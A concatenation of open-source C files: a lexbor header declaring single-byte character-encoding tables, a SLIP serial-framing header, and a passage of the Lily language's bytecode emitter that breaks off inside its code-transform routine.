<gh_stars>100-1000 /* * Copyright (C) 2019 <NAME> * * Author: <NAME> <<EMAIL>> */ /* * Caution! * This file generated by the script "utils/lexbor/encoding/single-byte.py"! * Do not change this file! */ #ifndef LEXBOR_ENCODING_SINGLE_H #define LEXBOR_ENCODING_SINGLE_H #ifdef __cplusplus extern "C" { #endif #include "lexbor/encoding/base.h" #include "lexbor/core/shs.h" #define LXB_ENCODING_SINGLE_HASH_IBM866_SIZE 344 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_10_SIZE 343 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_13_SIZE 345 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_14_SIZE 407 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_15_SIZE 344 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_16_SIZE 413 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_2_SIZE 368 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_3_SIZE 343 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_4_SIZE 343 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_5_SIZE 343 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_6_SIZE 343 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_7_SIZE 344 #define LXB_ENCODING_SINGLE_HASH_ISO_8859_8_SIZE 347 #define LXB_ENCODING_SINGLE_HASH_KOI8_R_SIZE 486 #define LXB_ENCODING_SINGLE_HASH_KOI8_U_SIZE 380 #define LXB_ENCODING_SINGLE_HASH_MACINTOSH_SIZE 343 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_1250_SIZE 432 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_1251_SIZE 362 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_1252_SIZE 373 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_1253_SIZE 354 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_1254_SIZE 354 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_1255_SIZE 467 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_1256_SIZE 343 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_1257_SIZE 355 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_1258_SIZE 405 #define LXB_ENCODING_SINGLE_HASH_WINDOWS_874_SIZE 359 #define LXB_ENCODING_SINGLE_HASH_X_MAC_CYRILLIC_SIZE 373 LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_ibm866[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_10[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_13[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_14[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_15[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_16[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_2[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_3[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_4[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_5[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_6[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_7[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_iso_8859_8[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_koi8_r[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_koi8_u[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_macintosh[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_1250[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_1251[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_1252[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_1253[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_1254[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_1255[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_1256[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_1257[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_1258[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_windows_874[128]; LXB_EXTERN const lxb_encoding_single_index_t lxb_encoding_single_index_x_mac_cyrillic[128]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_ibm866[345]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_10[344]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_13[346]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_14[408]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_15[345]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_16[414]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_2[369]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_3[344]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_4[344]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_5[344]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_6[344]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_7[345]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_iso_8859_8[348]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_koi8_r[487]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_koi8_u[381]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_macintosh[351]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_1250[433]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_1251[363]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_1252[374]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_1253[355]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_1254[355]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_1255[468]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_1256[357]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_1257[356]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_1258[406]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_windows_874[360]; LXB_EXTERN const lexbor_shs_hash_t lxb_encoding_single_hash_x_mac_cyrillic[374]; #ifdef __cplusplus } /* extern "C" */ #endif #endif /* LEXBOR_ENCODING_SINGLE_H */
2,829
2,701
/* * Copyright (c) 2016 Cesanta Software Limited * All rights reserved * * This program is free software; you can redistribute it and/or modify it under * the terms of the GNU General Public License as published by the Free Software * Foundation; either version 2 of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. * * You should have received a copy of the GNU General Public License along with * this program; if not, write to the Free Software Foundation, Inc., 51 Franklin * Street, Fifth Floor, Boston, MA 02110-1301 USA. */ #ifndef SLIP_H_ #define SLIP_H_ #ifdef ESP8266 #include <c_types.h> #else #include <stdint.h> #endif /* Send the SLIP frame begin/end delimiter. */ void SLIP_send_frame_delimiter(void); /* Send a single character of SLIP frame data, escaped as per SLIP escaping. */ void SLIP_send_frame_data(char ch); /* Send some SLIP frame data, escaped as per SLIP escaping. */ void SLIP_send_frame_data_buf(const void *buf, uint32_t size); /* Send a full SLIP frame, with specified contents. */ void SLIP_send(const void *pkt, uint32_t size); typedef enum { SLIP_NO_FRAME, SLIP_FRAME, SLIP_FRAME_ESCAPING } slip_state_t; int16_t SLIP_recv_byte(char byte, slip_state_t *state); #define SLIP_FINISHED_FRAME -2 #define SLIP_NO_BYTE -1 /* Receive a SLIP frame, with specified contents. */ uint32_t SLIP_recv(void *pkt, uint32_t max_len); #endif /* SLIP_H_ */
531
303
<gh_stars>100-1000 #include <string.h> #include <inttypes.h> #include "lily_alloc.h" #include "lily_ast.h" #include "lily_value.h" #include "lily_emitter.h" #include "lily_opcode.h" #include "lily_emit_table.h" #include "lily_parser.h" #include "lily_opcode_table.h" #include "lily_cls_function.h" /** Emitter is responsible for: * Taking in a given tree and writing out code that represents it. In the case of lambdas, it will dispatch into parser to process the lambdas block. * Verifying that call argument counts are correct, and that types are valid. * Doing block handling + validation (if/elif/else, for.., etc.) * Preparing functions to be called by the vm when functions exit. **/ # define IS_LOOP_BLOCK(b) (b == BLOCK_WHILE || \ b == BLOCK_DO_WHILE || \ b == BLOCK_FOR_IN) # define lily_raise_adjusted(r, adjust, error_code, message, ...) \ { \ r->line_adjust = adjust; \ lily_raise(r, error_code, message, __VA_ARGS__); \ } static int type_matchup(lily_emit_state *, lily_type *, lily_ast *); static void eval_tree(lily_emit_state *, lily_ast *, lily_type *, int); static void eval_variant(lily_emit_state *, lily_ast *, lily_type *, int); static void add_call_state(lily_emit_state *); /*****************************************************************************/ /* Emitter setup and teardown */ /*****************************************************************************/ lily_emit_state *lily_new_emit_state(lily_options *options, lily_symtab *symtab, lily_raiser *raiser) { lily_emit_state *emit = lily_malloc(sizeof(lily_emit_state)); emit->patches = lily_malloc(sizeof(int) * 4); emit->match_cases = lily_malloc(sizeof(int) * 4); emit->ts = lily_new_type_system(options, symtab, raiser); emit->code = lily_malloc(sizeof(uint16_t) * 32); emit->closed_syms = lily_malloc(sizeof(lily_sym *) * 4); emit->transform_table = NULL; emit->transform_size = 0; emit->call_values = lily_malloc(sizeof(lily_sym *) * 8); emit->call_state = NULL; emit->code_pos = 0; emit->code_size = 32; emit->call_values_pos = 0; emit->call_values_size = 8; emit->closed_pos = 0; emit->closed_size = 4; emit->match_case_pos = 0; emit->match_case_size = 4; emit->block = NULL; emit->unused_storage_start = NULL; emit->all_storage_start = NULL; emit->all_storage_top = NULL; emit->patch_pos = 0; emit->patch_size = 4; emit->lambda_depth = 0; emit->function_depth = 0; emit->current_class = NULL; emit->raiser = raiser; emit->expr_num = 1; emit->loop_start = -1; add_call_state(emit); return emit; } void lily_free_emit_state(lily_emit_state *emit) { lily_block *current, *temp; lily_storage *current_store, *temp_store; current = emit->block; while (current && current->prev) current = current->prev; while (current) { temp = current->next; lily_free(current); current = temp; } current_store = emit->all_storage_start; while (current_store) { temp_store = current_store->next; lily_free(current_store); current_store = temp_store; } lily_emit_call_state *call_iter = emit->call_state; if (call_iter) { while (call_iter->prev != NULL) call_iter = call_iter->prev; lily_emit_call_state *call_next; while (call_iter) { call_next = call_iter->next; lily_free(call_iter); call_iter = call_next; } } lily_free(emit->transform_table); lily_free(emit->closed_syms); lily_free(emit->call_values); lily_free_type_system(emit->ts); lily_free(emit->match_cases); lily_free(emit->patches); lily_free(emit->code); lily_free(emit); } /*****************************************************************************/ /* Writing functions */ /*****************************************************************************/ /* small_grow Grow the size of emitter's current code block once. This should be called if a grow must be done, and the code to be written is not a variable size. This is intended to be called by individual write_* functions which will only need one grow at the most. */ static void small_grow(lily_emit_state *emit) { emit->code_size *= 2; emit->code = lily_realloc(emit->code, sizeof(uint16_t) * emit->code_size); } /* write_prep This ensures that the current function can take 'size' more blocks of code. This will grow emitter's code until it's the right size, if necessary. */ static void write_prep(lily_emit_state *emit, int size) { if ((emit->code_pos + size) > emit->code_size) { while ((emit->code_pos + size) > emit->code_size) emit->code_size *= 2; emit->code = lily_realloc(emit->code, sizeof(uint16_t) * emit->code_size); } } /* These next five functions write a particular number of instructions to code and increment the code's position. Some tips on writing instructions to code: * write_5 and write_2 is better than inlining a "write_7", except for certain circumstances. * If implementing new instructions, 'show' is helpful when debugging. */ static void write_1(lily_emit_state *emit, uint16_t one) { if ((emit->code_pos + 1) > emit->code_size) small_grow(emit); emit->code[emit->code_pos] = one; emit->code_pos += 1; } static void write_2(lily_emit_state *emit, uint16_t one, uint16_t two) { if ((emit->code_pos + 2) > emit->code_size) small_grow(emit); emit->code[emit->code_pos] = one; emit->code[emit->code_pos + 1] = two; emit->code_pos += 2; } static void write_3(lily_emit_state *emit, uint16_t one, uint16_t two, uint16_t three) { if ((emit->code_pos + 3) > emit->code_size) small_grow(emit); emit->code[emit->code_pos] = one; emit->code[emit->code_pos + 1] = two; emit->code[emit->code_pos + 2] = three; emit->code_pos += 3; } static void write_4(lily_emit_state *emit, uint16_t one, uint16_t two, uint16_t three, uint16_t four) { if ((emit->code_pos + 4) > emit->code_size) small_grow(emit); emit->code[emit->code_pos] = one; emit->code[emit->code_pos + 1] = two; emit->code[emit->code_pos + 2] = three; emit->code[emit->code_pos + 3] = four; emit->code_pos += 4; } static void write_5(lily_emit_state *emit, uint16_t one, uint16_t two, uint16_t three, uint16_t four, uint16_t five) { if ((emit->code_pos + 5) > emit->code_size) small_grow(emit); emit->code[emit->code_pos] = one; emit->code[emit->code_pos + 1] = two; emit->code[emit->code_pos + 2] = three; emit->code[emit->code_pos + 3] = four; emit->code[emit->code_pos + 4] = five; emit->code_pos += 5; } /*****************************************************************************/ /* Internal helper functions */ /*****************************************************************************/ /* opname Return a string that represents the given lily_expr_op. */ static char *opname(lily_expr_op op) { static char *opnames[] = {"+", "-", "==", "<", "<=", ">", ">=", "!=", "%", "*", "/", "<<", ">>", "&", "|", "^", "!", "-", "&&", "||", "=", "+=", "-=", "%=", "*=", "/=", "<<=", ">>="}; return opnames[op]; } /* condition_optimize_check This is called when lily_emit_eval_condition is called with a tree that has type 'tree_literal'. If the given tree is always true, then the emitter can optimize the load out. Without this, a 'while 1: { ... }' will load "1" and check it at the top of every loop...which is rather silly. */ static int condition_optimize_check(lily_ast *ast) { int can_optimize = 1; /* This may not be a literal. It could be a user-defined/built-in function which would always automatically be true. */ if (ast->result->flags & ITEM_TYPE_TIE) { lily_tie *lit = (lily_tie *)ast->result; /* Keep this synced with vm's o_jump_if calculation. */ int lit_cls_id = lit->type->cls->id; if (lit_cls_id == SYM_CLASS_INTEGER && lit->value.integer == 0) can_optimize = 0; else if (lit_cls_id == SYM_CLASS_DOUBLE && lit->value.doubleval == 0.0) can_optimize = 0; else if (lit_cls_id == SYM_CLASS_STRING && lit->value.string->size == 0) can_optimize = 0; else if (lit->type->cls->flags & CLS_VARIANT_CLASS) can_optimize = 0; } return can_optimize; } /* count_inner_try_blocks Count the number of 'try' blocks entered where an 'except' has not yet been seen. This counts up to the deepest loop block, or the current function, whichever comes first. */ static int count_inner_try_blocks(lily_emit_state *emit) { lily_block *block_iter = emit->block; int ret = 0; while (IS_LOOP_BLOCK(block_iter->block_type) == 0 && (block_iter->block_type & BLOCK_FUNCTION) == 0) { if (block_iter->block_type == BLOCK_TRY) ret++; block_iter = block_iter->prev; } return ret; } /* write_pop_inner_try_blocks This must be called before any 'continue', 'break', or 'return' code is emitted. It ensures that the vm will pop the proper number of 'try' blocks registered to offset the movement being done. */ static void write_pop_inner_try_blocks(lily_emit_state *emit) { int try_count = count_inner_try_blocks(emit); if (try_count) { write_prep(emit, try_count); int i; for (i = 0;i <= try_count;i++) emit->code[emit->code_pos+i] = o_pop_try; emit->code_pos += try_count; } } /* find_deepest_loop Look backward from the current block to find the inner-most block that is a loop. This block is the one that should receive any 'continue' and 'break' jumps. Success: A block is returned that is a loop block. Failure: NULL is returned. */ static lily_block *find_deepest_loop(lily_emit_state *emit) { lily_block *block, *ret; ret = NULL; for (block = emit->block; block; block = block->prev) { if (IS_LOOP_BLOCK(block->block_type)) { ret = block; break; } else if (block->block_type & BLOCK_FUNCTION) { ret = NULL; break; } } return ret; } static lily_block *find_deepest_func(lily_emit_state *emit) { lily_block *block; lily_block *result = NULL; for (block = emit->block; block; block = block->prev) { if ((block->block_type & BLOCK_FUNCTION) && block->block_type != BLOCK_FILE) { result = block; break; } } return result; } /* grow_patches Make emitter's patches bigger. */ static void grow_patches(lily_emit_state *emit) { emit->patch_size *= 2; emit->patches = lily_realloc(emit->patches, sizeof(int) * emit->patch_size); } void inject_patch_into_block(lily_emit_state *emit, lily_block *block, int target) { if (emit->patch_pos == emit->patch_size) grow_patches(emit); /* This is the most recent block, so add the patch to the top. */ if (emit->block == block) { emit->patches[emit->patch_pos] = target; emit->patch_pos++; } else { /* The block is not on top, so this will be fairly annoying... */ int move_by, move_start; move_start = block->next->patch_start; move_by = emit->patch_pos - move_start; /* Move everything after this patch start over one, so that there's a hole after the last while patch to write in a new one. */ memmove(emit->patches+move_start+1, emit->patches+move_start, move_by * sizeof(int)); emit->patch_pos++; emit->patches[move_start] = target; for (block = block->next; block; block = block->next) block->patch_start++; } } void write_block_patches(lily_emit_state *emit, int pos) { int from = emit->patch_pos-1; int to = emit->block->patch_start; for (;from >= to;from--) { /* Skip -1's, which are fake patches from conditions that were optimized out. */ if (emit->patches[from] != -1) emit->code[emit->patches[from]] = pos; } /* Use the space for new patches now. */ emit->patch_pos = to; } static void grow_closed_syms(lily_emit_state *emit) { emit->closed_size *= 2; emit->closed_syms = lily_realloc(emit->closed_syms, sizeof(lily_sym *) * emit->closed_size); } static void grow_match_cases(lily_emit_state *emit) { emit->match_case_size *= 2; emit->match_cases = lily_realloc(emit->match_cases, sizeof(int) * emit->match_case_size); } /* emit_jump_if Write a conditional jump and add it to emitter's current patches. 0 == o_jump_if_false The jump happens if the ast's result is 0/false. 1 == o_jump_if_true The jump happens if the ast's result is non-zero. */ static void emit_jump_if(lily_emit_state *emit, lily_ast *ast, int jump_on) { write_4(emit, o_jump_if, jump_on, ast->result->reg_spot, 0); if (emit->patch_pos == emit->patch_size) grow_patches(emit); emit->patches[emit->patch_pos] = emit->code_pos - 1; emit->patch_pos++; } /* ensure_valid_condition_type This ensures that the resulting value for a condition is one that the vm can determine is true or false. If these are changed, then the vm's o_jump_if should be updated. */ static void ensure_valid_condition_type(lily_emit_state *emit, lily_type *type) { int cls_id = type->cls->id; if (cls_id != SYM_CLASS_INTEGER && cls_id != SYM_CLASS_DOUBLE && cls_id != SYM_CLASS_STRING && cls_id != SYM_CLASS_LIST) lily_raise(emit->raiser, lily_SyntaxError, "^T is not a valid condition type.\n", type); } /* check_valid_subscript Determine if the given var is subscriptable by the type of the given index. Additionally, an 'index literal' is given as a special-case for tuples. This raises an error for unsubscriptable types. */ static void check_valid_subscript(lily_emit_state *emit, lily_ast *var_ast, lily_ast *index_ast) { int var_cls_id = var_ast->result->type->cls->id; if (var_cls_id == SYM_CLASS_LIST) { if (index_ast->result->type->cls->id != SYM_CLASS_INTEGER) lily_raise_adjusted(emit->raiser, var_ast->line_num, lily_SyntaxError, "list index is not an integer.\n", ""); } else if (var_cls_id == SYM_CLASS_HASH) { lily_type *want_key = var_ast->result->type->subtypes[0]; lily_type *have_key = index_ast->result->type; if (want_key != have_key) { lily_raise_adjusted(emit->raiser, var_ast->line_num, lily_SyntaxError, "hash index should be type '^T', not type '^T'.\n", want_key, have_key); } } else if (var_cls_id == SYM_CLASS_TUPLE) { if (index_ast->result->type->cls->id != SYM_CLASS_INTEGER || index_ast->tree_type != tree_literal) { lily_raise_adjusted(emit->raiser, var_ast->line_num, lily_SyntaxError, "tuple subscripts must be integer literals.\n", ""); } int index_value = index_ast->literal->value.integer; lily_type *var_type = var_ast->result->type; if (index_value < 0 || index_value >= var_type->subtype_count) { lily_raise_adjusted(emit->raiser, var_ast->line_num, lily_SyntaxError, "Index %d is out of range for ^T.\n", index_value, var_type); } } else { lily_raise_adjusted(emit->raiser, var_ast->line_num, lily_SyntaxError, "Cannot subscript type '^T'.\n", var_ast->result->type); } } /* get_subscript_result Get the type that would result from doing a subscript. tuple_index_lit is a special case for tuples. */ static lily_type *get_subscript_result(lily_type *type, lily_ast *index_ast) { lily_type *result; if (type->cls->id == SYM_CLASS_LIST) result = type->subtypes[0]; else if (type->cls->id == SYM_CLASS_HASH) result = type->subtypes[1]; else if (type->cls->id == SYM_CLASS_TUPLE) { /* check_valid_subscript ensures that this is safe. */ int literal_index = index_ast->literal->value.integer; result = type->subtypes[literal_index]; } else /* Won't happen, but keeps the compiler from complaining. */ result = NULL; return result; } /* Add a new storage to emitter's list of storages. */ static void add_storage(lily_emit_state *emit) { lily_storage *storage = lily_malloc(sizeof(lily_storage)); storage->type = NULL; storage->next = NULL; storage->expr_num = 0; storage->flags = 0; if (emit->all_storage_start == NULL) emit->all_storage_start = storage; else emit->all_storage_top->next = storage; emit->all_storage_top = storage; emit->unused_storage_start = storage; } /* get_storage Attempt to get an unused storage of the type given. Additionally, a line number is required to fix up the line number in case there is an out-of-memory situation. Additionally, this function ensures that emit->unused_storage_start is both updated appropriately and will never become NULL. This returns a valid storage. */ static lily_storage *get_storage(lily_emit_state *emit, lily_type *type) { lily_storage *storage_iter = emit->block->storage_start; int expr_num = emit->expr_num; /* Emitter's linked list of storages is done such that there is always one unused storage at the end. Therefore, this loop will never end with storage_iter == NULL. */ while (storage_iter) { /* If the type is NULL, then nothing is using this storage and it can be repurposed for the current function. */ if (storage_iter->type == NULL) { storage_iter->type = type; storage_iter->reg_spot = emit->function_block->next_reg_spot; emit->function_block->next_reg_spot++; /* This ensures that lambdas don't clobber on current storages. */ if (storage_iter->next) emit->unused_storage_start = storage_iter->next; break; } else if (storage_iter->type == type && storage_iter->expr_num != expr_num) { storage_iter->expr_num = expr_num; break; } storage_iter = storage_iter->next; } storage_iter->expr_num = expr_num; /* This ensures that emit->unused_storage_start is always valid and always something unused. */ if (storage_iter->next == NULL) add_storage(emit); storage_iter->flags &= ~SYM_NOT_ASSIGNABLE; return storage_iter; } /* This attempts to locate a storage, but makes sure that it has never been used before. This is necessary for closures, which dump the source of upvalue into a register (this prevents it from being destroyed early). */ lily_storage *get_unique_storage(lily_emit_state *emit, lily_type *type) { int next_spot = emit->function_block->next_reg_spot; lily_storage *s = NULL; /* As long as the next register spot doesn't change, the resulting storage may be one that is used somewhere else. There's probably a faster, more direct approach, but this is really likely to succeed the first time. */ do { s = get_storage(emit, type); } while (emit->function_block->next_reg_spot == next_spot); return s; } static void close_over_sym(lily_emit_state *emit, lily_sym *sym) { if (emit->closed_pos == emit->closed_size) grow_closed_syms(emit); emit->closed_syms[emit->closed_pos] = sym; emit->closed_pos++; sym->flags |= SYM_CLOSED_OVER; } static int find_closed_sym_spot(lily_emit_state *emit, lily_sym *sym) { int result = -1, i; for (i = 0;i < emit->closed_pos;i++) { if (emit->closed_syms[i] == sym) { result = i; break; } } return result; } static int find_closed_self_spot(lily_emit_state *emit) { int i, result = -1; for (i = 0;i < emit->closed_pos;i++) { lily_sym *s = emit->closed_syms[i]; if ((s->flags & ITEM_TYPE_VAR) == 0) { result = i; break; } } return result; } static void maybe_close_over_class_self(lily_emit_state *emit) { lily_block *block = emit->block; while ((block->block_type & BLOCK_CLASS) == 0) block = block->prev; lily_sym *self = (lily_sym *)block->self; if (find_closed_sym_spot(emit, self) == -1) close_over_sym(emit, self); if (emit->block->self == NULL) emit->block->self = get_storage(emit, self->type); } /* write_build_op This is responsible for writing the actual o_build_list_tuple or o_build_hash code, depending on the opcode given. The list will be put into a register at reg_spot, which is assumed to have the correct type to hold the given result. emit: The emitter holding the function to write to. opcode: The opcode to write: o_build_list_tuple for a list/tuple, or o_build_hash for a hash. first_arg: The first argument to start iterating over. line_num: A line number for the o_build_* opcode. num_values: The number of values that will be written. This is typically the parent's args_collected. reg_spot: The id of a register where the opcode's result will go. The caller is expected to ensure that the register has the proper type to hold the resulting thing. */ static void write_build_op(lily_emit_state *emit, int opcode, lily_ast *first_arg, int line_num, int num_values, int reg_spot) { int i; lily_ast *arg; write_prep(emit, num_values + 4); emit->code[emit->code_pos] = opcode; emit->code[emit->code_pos+1] = line_num; emit->code[emit->code_pos+2] = num_values; for (i = 3, arg = first_arg; arg != NULL; arg = arg->next_arg, i++) emit->code[emit->code_pos + i] = arg->result->reg_spot; emit->code[emit->code_pos+i] = reg_spot; emit->code_pos += 4 + num_values; } static void emit_rebox_value(lily_emit_state *, lily_type *, lily_ast *); /* rebox_variant_to_enum This is a convenience function that will convert the variant value within the given ast to an enum value. Note: If the variant does not supply full type information, then missing types are given the type of 'any'. */ static void rebox_variant_to_enum(lily_emit_state *emit, lily_ast *ast) { lily_type *rebox_type = lily_ts_build_enum_by_variant(emit->ts, ast->result->type); emit_rebox_value(emit, rebox_type, ast); } static lily_storage *emit_rebox_sym(lily_emit_state *emit, lily_type *new_type, lily_sym *sym, uint32_t line_num) { lily_storage *storage = get_storage(emit, new_type); /* Don't allow a bare variant to be thrown into an any until it's thrown into an enum box first. */ if (new_type->cls->id == SYM_CLASS_ANY && sym->type->cls->flags & CLS_VARIANT_CLASS) { lily_type *rebox_type = lily_ts_build_enum_by_variant(emit->ts, sym->type); sym = (lily_sym *)emit_rebox_sym(emit, rebox_type, sym, line_num); } write_4(emit, o_assign, line_num, sym->reg_spot, storage->reg_spot); return storage; } /* emit_rebox_value Make a storage of type 'new_type' and assign ast's result to it. The tree's result is written over. */ static void emit_rebox_value(lily_emit_state *emit, lily_type *new_type, lily_ast *ast) { lily_storage *storage = get_storage(emit, new_type); /* Don't allow a bare variant to be thrown into an any until it's thrown into an enum box first. */ if (new_type->cls->id == SYM_CLASS_ANY && ast->result->type->cls->flags & CLS_VARIANT_CLASS) { rebox_variant_to_enum(emit, ast); } write_4(emit, o_assign, ast->line_num, ast->result->reg_spot, storage->reg_spot); ast->result = (lily_sym *)storage; } /* emit_rebox_to_any This is a helper function that calls emit_rebox_value on the given tree with a type of class any. */ static void emit_rebox_to_any(lily_emit_state *emit, lily_ast *ast) { emit_rebox_value(emit, emit->symtab->any_class->type, ast); } /* setup_types_for_build This is called before building a static list or hash. expect_type is checked for being a generic that unwraps to a type with a class id of 'wanted_id', or having that actual id. If expect_type's class is correct, then the types inside of it are laid down into emitter's ts. They can be retrieved using lily_ts_get_ceiling_type. This processing is done because it's necessary for type inference. Returns 1 on success, 0 on failure. */ static int setup_types_for_build(lily_emit_state *emit, lily_type *expect_type, int wanted_id, int did_resolve) { int ret = 1; if (expect_type && did_resolve == 0 && expect_type->cls->id == SYM_CLASS_GENERIC) { expect_type = lily_ts_easy_resolve(emit->ts, expect_type); did_resolve = 1; } if (expect_type && expect_type->cls->id == wanted_id) { int i; for (i = 0;i < expect_type->subtype_count;i++) { lily_type *inner_type = expect_type->subtypes[i]; if (did_resolve == 0 && inner_type->cls->id == SYM_CLASS_GENERIC) { inner_type = lily_ts_easy_resolve(emit->ts, inner_type); } lily_ts_set_ceiling_type(emit->ts, inner_type, i); } } else ret = 0; return ret; } /* add_var_chain_to_info Add info for a linked-list of vars to the given register info. Functions do not get a register (VAR_IS_READONLY), so don't add them. */ static void add_var_chain_to_info(lily_emit_state *emit, lily_register_info *info, lily_var *from_var, lily_var *to_var) { while (from_var != to_var) { if ((from_var->flags & VAR_IS_READONLY) == 0) { info[from_var->reg_spot].type = from_var->type; info[from_var->reg_spot].name = from_var->name; info[from_var->reg_spot].line_num = from_var->line_num; } from_var = from_var->next; } } /* add_storage_chain_to_info Add info for a linked-list of storages to the given register info. Only used by finalize_function_val. */ static void add_storage_chain_to_info(lily_register_info *info, lily_storage *storage) { while (storage && storage->type) { info[storage->reg_spot].type = storage->type; info[storage->reg_spot].name = NULL; info[storage->reg_spot].line_num = -1; storage = storage->next; } } /* This traverses within emit->code from the initially given start and end positions. This function is concerned with values that are local to this function which have been closed over. * Any read of a local that has been closed over will have a o_get_upvalue written before the opcode. * Any write of a local will have o_set_upvalue written after the opcode. * Jumps encounted are adjusted to account for any get/set_upvalue's written. In most cases, this isn't necessary. However, consider this: define f() { var i = 10 var g = {|| i += 1 } g() i += 1 show(i) } In this case, 'i' should have o_get/set_upvalue written appropriately so that 'i' will come out as 12 (the lambda update being factored in) instead of 11 (using local assigns only). */ static void transform_code(lily_emit_state *emit, lily_function_val *f, int pos, int end, int starting_adjust) { uint16_t *transform_table = emit->transform_table; int jump_adjust = starting_adjust; int jump_pos = -1, jump_end; int output_pos = -1, output_end; /* Do not create a local copy of emit->code here, because the write_4's may cause it to be realloc'd. */ while (pos < end) { int j = 0, op = emit->code[pos]; int c, count, call_type, i, line_num; const int *opcode_data = opcode_table[op]; for (i = 1;i <= opcode_data[1];i++) { c = opcode_data[i + 1]; if (c == C_LINENO) line_num = emit->code[pos + i + j]; else if ((c == C_INPUT || c == C_MATCH_INPUT || (c == C_CALL_INPUT && call_type == 0)) && op != o_create_function) { int spot = emit->code[pos + i + j]; if (transform_table[spot] != (uint16_t)-1) { write_4(emit, o_get_upvalue, line_num, transform_table[spot], spot); jump_adjust += 4; } } else if (c == C_OUTPUT) { int spot = emit->code[pos + i + j]; if (spot != (uint16_t)-1 && transform_table[spot] != -1) { output_pos = i + j; output_end = output_pos + 1; } } else if (c == C_COUNT) count = emit->code[pos + i + j]; else if (c == C_NOP) break; else if (c == C_CALL_TYPE) call_type = emit->code[pos + i + j]; else if (c == C_COUNT_OUTPUTS) { output_pos = i + j; output_end = output_pos + count; j += count - 1; } else if (c == C_JUMP) { 